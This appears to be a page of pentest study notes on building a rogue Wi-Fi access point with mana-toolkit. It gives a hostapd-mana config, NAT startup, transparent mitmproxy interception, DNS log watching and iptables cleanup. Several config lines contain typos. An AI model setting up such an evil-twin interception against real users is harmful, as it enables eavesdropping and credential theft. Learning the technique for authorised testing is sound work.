Creating a rogue AP

edit in configuration file etc/mana-toolkit/hostapd-mana.conf

interface, SSID, channel, BSSID

improved version from hostapd-mana.conf

interface=wlan0
hw_mode=g
channel=10
ieee80211d=1
country_code=GY
ieee80211n=1
wmm_enabled=1
driver=nl80211
ssid=mirage21
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=somepassword

bssid=30:b4:a1:37:fo:fo

# Prevent dissasociations
disassoc low_ack=0
ap_max_inactivity-3000

# no SSID cloaking
#ignore_broadcast_ssid=0

#1 log all messages
logger syslog=-1
logger stdout=-1

#2 informational messages
logger syslog_level=2
logger stdout_level=2

ctrl interface=/var/run/hostapd
ctrl interface_group=0

# Finally, enable mana
#enable mana=1
# Limit mana to responding only to the device probing (0), or not (1)
#mana Loud=0
# Extend MAC ACLS to probe frames
#mana macacl=e
# Put hostapd in white/black list mode
#macaddr_acl=0
# only used if you want to do filter by MAC address
#accept_mac_file=/etc/mana-toolkit/hostapd.accept
#deny_mac_file=/etc/mana-toolkit/hostapd.deny

then run mana-toolkit

cd /usr/share/mana-toolkit/run-mana
sudo ./start-nat-simple.sh

run proxy

mitmproxy --mode transparent --showhost

show dns logs

tail -f /tmp/dnsmasq.log

action refused → because it try to connect to SSL certificate but not found it

Return all settings to default

systemctl restart NetworkManager
systemctl restart apache2
iptables --flush
iptables --table nat --flush	
iptables --delete-chain
iptables --table nat --delete-chain	
systemctl start NetworkManager

PreviousRouge Access Point NextWEP

Last updated 26 days ago